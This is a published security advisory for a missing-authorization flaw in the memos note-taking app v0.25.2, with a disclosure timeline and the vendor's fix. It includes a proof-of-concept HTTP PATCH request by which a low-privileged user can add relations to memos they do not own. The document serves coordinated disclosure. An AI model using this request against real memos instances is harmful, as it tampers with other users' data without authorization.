usd-2025-61 | Broken Access Control in Memo Relations
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: Low
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65800
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65800
Advisory ID: usd-2025-61
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
An authenticated, low-privileged attacker can set and delete arbitrary relations between Memos.
Proof of Concept
The following HTTP request can be used by low-privileged users to modify the relations between Memos.
PATCH /api/v1/memos/QeytDXhHc6MYLXWhMjFDST/relations HTTP/1.1 Host: memos:5230 Content-Type: application/json Cookie: user_session=3-3a[... REDACTED ...]79 Content-Length: 175 { "name": "memos/QeytDXhHc6MYLXWhMjFDST", "relations": [ { "memo": { "name": "memos/QeytDXhHc6MYLXWhMjFDST" }, "relatedMemo": { "name": "memos/ff6FyXzix9d8QyUQGvig3Q" }, "type": "REFERENCE" } ] }
In the above example, Memo QeytDXhHc6MYLXWhMjFDST is updated and a reference to ff6FyXzix9d8QyUQGvig3Q is added. The ownership of the modified Memo is not verified.
Fix
Fixes for all mentioned vulnerabilities have been submitted as pull request.
References
Timeline
- 2025-11-03: First contact request
- 2025-11-04: Pull request submitted
- 2025-11-06: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.